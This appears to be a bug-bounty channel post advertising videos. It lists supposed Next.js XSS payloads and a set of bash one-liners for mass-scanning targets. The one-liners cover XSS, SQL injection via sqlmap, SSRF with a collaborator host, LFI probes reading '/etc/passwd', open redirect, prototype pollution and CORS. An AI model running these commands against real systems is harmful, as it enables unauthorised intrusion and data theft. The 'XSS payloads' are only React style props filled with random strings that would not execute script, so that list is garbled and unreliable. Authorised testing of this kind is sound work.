📂 LFI Mass Hunting Explained | Directory Traversal POC & CVE-2024-9935 for Bug Bounty

hi

hello subscriter .. i am back

Lesser-known XSS payloads that work with Next.js

[ what you think? ]

- Dynamic CSS injection
<div style={background-color: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- CSS Variable injection
<div style={--var: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- Object Literal injection
<div style={position: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- CSS Flexbox injection
<div style={display: flex; justify-content: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- Unicode Character injection
<div style={font-family: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- Dynamic Font injection
<div style={font-family: ${Math.random().toString(36).substr(2, 10) + 'px'}}>XSS</div>

- CSS Animation injection
<div style={animation: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- Web Font injection
<div style={font-family: ${Math.random().toString(36).substr(2, 10) + '-webfont'}}>XSS</div>

- CSS Grid injection
<div style={display: grid; grid-template-columns: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

- CSS Transform injection
<div style={transform: ${Math.random().toString(36).substr(2, 10)}}>XSS</div>

Hi..my all friends... How are you?..

Today I made a video that uses a tool through the video and can detect xss through a tool without having to do anything else.

🚀 Automated XSS Methodology for Bug Bounty Hunters | 1-Click Exploits
https://youtu.be/nHlOKCCo9kg?si=Rv8f5qK_Gcnwr1ZI

👨‍💻 BUG BOUNTY WITH ONE-LINE BASH SCRIPTS 🕵️
𝐗𝐒𝐒 ⪼
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
𝐒𝐐𝐋𝐢 ⪼
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
𝐒𝐒𝐑𝐅 ⪼
findomain -t https://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace 𝘩𝘵𝘵𝘱://𝘠𝘖𝘜𝘙.𝘣𝘶𝘳𝘱𝘤𝘰𝘭𝘭𝘢𝘣𝘰𝘳𝘢𝘵𝘰𝘳.𝘯𝘦𝘵
𝐋𝐅𝐈 ⪼
gau https://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
𝐎𝐏𝐄𝐍 𝐑𝐄𝐃𝐈𝐑𝐄𝐂𝐓 ⪼
gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
𝐏𝐑𝐎𝐓𝐎𝐓𝐘𝐏𝐄 𝐏𝐎𝐋𝐋𝐔𝐓𝐈𝐎𝐍 ⪼
subfinder -d https://target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
𝐂𝐎𝐑𝐒 ⪼
gau https://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 .𝐣𝐬 ⪼
echo https://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder https://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 𝐔𝐑𝐋𝐬 𝐟𝐫𝐨𝐦 𝐜𝐨𝐦𝐦𝐞𝐧𝐭 ⪼
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
𝐃𝐮𝐦𝐩 𝐈𝐧-𝐬𝐜𝐨𝐩𝐞 𝐀𝐬𝐬𝐞𝐭𝐬 𝐟𝐫𝐨𝐦 𝐇𝐚𝐜𝐤𝐞𝐫𝐎𝐧𝐞 ⪼
curl -sL 𝘩𝘵𝘵𝘱𝘴://𝘨𝘪𝘵𝘩𝘶𝘣.𝘤𝘰𝘮/𝘢𝘳𝘬𝘢𝘥𝘪𝘺𝘵/𝘣𝘰𝘶𝘯𝘵𝘺-𝘵𝘢𝘳𝘨𝘦𝘵𝘴-𝘥𝘢𝘵𝘢/𝘣𝘭𝘰𝘣/𝘮𝘢𝘴𝘵𝘦𝘳/𝘥𝘢𝘵𝘢/𝘩𝘢𝘤𝘬𝘦𝘳𝘰𝘯𝘦_𝘥𝘢𝘵𝘢.𝘫𝘴𝘰𝘯?𝘳𝘢𝘸=𝘵𝘳𝘶𝘦 | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
𝐅𝐢𝐧𝐝 𝐥𝐢𝐯𝐞 𝐡𝐨𝐬𝐭/𝐝𝐨𝐦𝐚𝐢𝐧/𝐚𝐬𝐬𝐞𝐭𝐬 ⪼
subfinder -d https://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
𝐒𝐜𝐫𝐞𝐞𝐧𝐬𝐡𝐨𝐭 ⪼
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'

CVExploits Search
https://cvexploits.io/

⚡️Tiny-XSS-Payloads - A collection of tiny XSS Payloads that can be used in different contexts.

✅tinyxss.terjanq.me

#xss #BugBounty #CyberSecurity

⚡️Broken Access Control to Mass Account Takeover.